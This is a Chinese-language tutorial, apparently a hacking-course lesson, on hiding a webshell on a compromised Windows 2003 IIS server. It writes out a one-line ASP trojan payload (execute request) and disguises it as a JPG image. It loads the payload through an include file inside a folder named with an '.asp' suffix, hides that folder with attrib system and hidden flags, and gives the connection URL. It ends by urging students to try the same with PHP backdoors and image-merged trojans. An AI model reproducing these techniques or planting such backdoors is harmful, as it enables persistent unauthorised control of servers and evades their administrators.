一直以来,拿到网站的webshell后如何对它进行保护是我们探讨的一个课题。对于这个,高人们也想出来了各种各样的方法来对它进行伪装与隐藏。当然,达到的效果各不相同,但是无论怎样,都给服务器的管理员增加了许多的麻烦。这节课,我们也来和大家一起探讨一种隐藏的方法,愿给广大学员起到一个抛砖引玉的作用。
首先,我们针对的系统是Windows2003的服务器系统(这个无论是否打了SP1补丁都是可以的)我们利用的就是Windows2003中的IIS会对以asp结尾的文件进行解析的“漏洞”来达到我们隐藏自己的网页后门的目的。
在服务器上的Web目录下(当然是比较深越好隐藏了)建立一个任意的以asp结尾的文件夹。例如我这里新建立一个叫做”programme.asp”的文件夹。那么在在这个文件夹里面新建立一个文本文件,里面的内容为 <!--#include file=”******”-->。其中的*****为我们要建立的另一个文件。首先我们在相同的目录下建立一个文本文件,在里面放进我们的一句话木马,例如<%execute request("value")%> 然后我们保存为任意格式的文件。这里为了隐蔽,我们可以更改为12.jpg。当然了。这个文件直接打开是不会显示图片的。这样,上面的那个文本文件就构造成为: <!--#include file=”12.jpg”-->了。
OK,一切准备工作都已经完毕。现在为了让我们的文件更为隐藏,我们可以给文件夹的隐藏属性进行设置。默认情况下,Windows2003系统是显示隐藏文件单不显示系统文件,所以我们可以利用attrib来给这个programme.asp文件夹加上系统属性。C:>attrib programme.asp +H +S
下面我们要做的就是用我们的木马连接端进行连接了。我们直接打开连接端程序,在上面输入我们的地址:http://www.xxx.com/programme.asp/1.txt。可以看到。已经连接上了。这样就达到了隐藏我们网页后门的目的了。
发散性思维:由于时间关系,我没有继续对这个进行测试,但是大家可以想到。我们可否利用建立PHP文件夹后缀来对php后门进行隐藏呢?能否用合并命令把一句话木马的服务端程序合并到正常的图片中呢?这样做是否可以更加隐蔽呢?我想,这些思维的扩展才是我今天要讲的主要内容。大家下去之后可以进行一下试验。
